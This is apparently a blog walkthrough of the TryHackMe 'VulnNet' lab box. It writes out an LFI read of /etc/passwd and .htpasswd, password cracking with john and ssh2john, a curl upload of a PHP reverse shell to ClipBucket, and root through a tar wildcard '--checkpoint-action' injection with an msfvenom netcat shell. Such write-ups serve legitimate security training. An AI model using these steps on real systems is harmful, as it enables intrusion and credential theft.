Home Try Hack Me - VulnNet Walkthrough
Post
Cancel

Try Hack Me - VulnNet Walkthrough

Posted Jul 26, 2022 Updated Jul 31, 2022
By Knox
4 min read

Intro

This is the oldest of the VulnNet boxes on Try Hack Me. It is also rated as a medium difficulty box.

Recon

First we will scan the host. I will use autorecon by Tib3rius to get things started.

If you have never used it before and would like some explaination, check out this post: Using AutoRecon

VulnNet Home Page:

Setup /etc/hosts file

  • Looking through the nmap scans we find a domain name: vulnnet.thm This means we should update our /etc/hosts file on our local attack machine with a line that looks like:

<xx.xx.xx.xx> vulnnet.thm Replace the xx.xx.xx.xx wit hthe ip the vulnnet machine is assigned.

  • If we look at the dirbuster/feroxbuster results we find 2 .js files.

Let’s examine these files for more clues.

Possible LFI Point

In one file we find a reference to: http://vulnnet.thm/index.php?referer= If we try http://vulnnet.thm/index.php?referer=/etc/passwd the page just looks like normal, but if we view source on the page that is returned:

Looks like we have two ‘real’ users:

1
2

root:x:0:0:root:/root:/bin/bash
server-management:x:1000:1000:server-management,,,:/home/server-management:/bin/bash

New Subdomain

In the other .js file we find a reference to a subdomain: broadcast.vulnnet.thm We should go back and add that to our line in /etc/hosts for VulnNet:

<xx.xx.xx.xx> vulnnet.thm broadcast.vulnet.thm Replace the xx.xx.xx.xx wit hthe ip the vulnnet machine is assigned.

When we go to the site we see that it directs us to log in. Using burp we verify it is “basic auth”

Ok so now let’s go back to our LFI - (Local File Inclusion) and check for /etc/apache2/sites-enabled/000-default.conf

Now lets see if we can view the .htpasswd file. We were able to retrieve a user hash. Let’s crack it with john

So here is the command I used:

1

john --pot=cracked.pot --wordlist=/usr/share/wordlists/rockyou.txt hash
  • I use the --pot=<filename>.pot so that john save any cracked passwords in that file, so I don’t forget to save them myself!
  • The --wordlist is the location ofthe wordlist you wish to use. Your rockyou.txt might live in a different place than mine.
  • And hash is just the name of the file I saved the hash we found in.

ClipBucket?

And now we login to Clip Bucket….what ever that is.

Let’s see if we can find out what version it is.

Let’s view the page source: And there it is: ClipBucket version 4.0

Exploiting ClipBucket

Let’s check searchsploit: searchsploit clipbucket

We can copy the exploit to our current location useing the -m (mirror) flag. searchsploit -m php/webapps/44250.txt

Reading through the exploit 44250.txt, it seems to imply that there is a /actions directory on the ClipBucket app. Let’s check it out….

So it looks like if we use this command:

1

sudo curl -F "file=@thm-shell.php" -F "plupload=1" -F "name=shell.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php" -u developers:<PASSWORD>

We should be able to upload a reverse shell.

DON’T foget to set up your listener! :)

After the file is uploaded check the actions directory and there is a new folder: CB_BEATS_UPLOAD_DIR the rev shell file will be in there.

Foothold

www-data user

First upgrade shell: python3 -c "import pty;pty.spawn('/bin/bash')"

First run this to make sure your path and some others things are setup correctly in your shell:

1

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp;export TERM=xterm-256color;alias ll='ls -lah --color=auto'

And I created a little one liner to get some quick info on the system.

1

echo '----------';which gcc;which cc;which python;which python3;which perl;echo '';which wget;which curl;which nc;echo '';whoami;id;echo '';file /bin/bash;echo '';uname -a;cat /etc/issue;cat /etc/*-release;echo '-----------'

Which gets you this:

Next I will use wget to copy the lse.sh script over to look for privesc options. Here is the github repo for LSE

We discover this file running LSE:

1
2
3

[!] fst190 Can we read any backup?......................................... yes!
---
-rw-rw-r-- 1 server-management server-management 1484 Jan 24  2021 /var/backups/ssh-backup.tar.gz

I wasn’t able to extract the tar file on the machine, so since we have python3 I fired up a python3 http server with: python3 -m http.server 8000 to copy the file over.

Extracting the backup file gives us an id_rsa file. But it is password protected.

Use ssh2john id_rsa > id_rsa.hash

and then use the john to crack the newly created hash.

DON’T forget to chmod 400 id_rsa

Now we can login through ssh with the server-management user.

server-management user

From this account running LSE reveals a cron running a file we have write access to. The script the cron runs is in /var/opt/backupsrv.sh Examining that file reveals that is making a backup out of all the files in /home/server-management/Documents using the “*” wildcard.

You can read about we can use this at gtfobins BTW that site should be on your speed dial!

There is also a great article about exploiting the wildcard HERE

On your local machine: msfvenom -p cmd/unix/reverse_netcat lhost=<local-ip> lport=<desired-port> R to get your reverse shell. Start your listener!

On the target machine navigate to /home/server-management/Documents

1
2
3
4

echo "YOUR REVERSE SHELL FROM MSFVENOM HERE" > shell.sh
chmod +x shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

And then wait for the cron to run. Your shell should pop up.

Go get that root flag!

THM VulnNet ctf medium linux subdomains LFI ssh2john burp
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents